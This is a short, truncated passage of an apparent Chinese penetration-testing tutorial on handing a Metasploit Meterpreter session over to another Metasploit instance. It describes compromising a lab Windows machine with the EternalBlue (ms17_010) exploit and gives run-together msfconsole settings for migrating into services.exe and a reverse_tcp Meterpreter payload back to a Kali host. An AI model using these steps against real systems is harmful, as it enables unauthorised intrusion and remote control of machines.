MSF派生给另外MSF,meterpreter派生给另外meterpreter,Metasploit
首先是通过ms17_010永恒之蓝拿下shell,192.168.50.146为受害者靶机,192.168.50.130为kali的ipsetautorunscriptpost/windows/manage/migratename=services.exesetpayloadwindows/x64/meterpreter/reverse_tcpsetlport5577setlhost192.168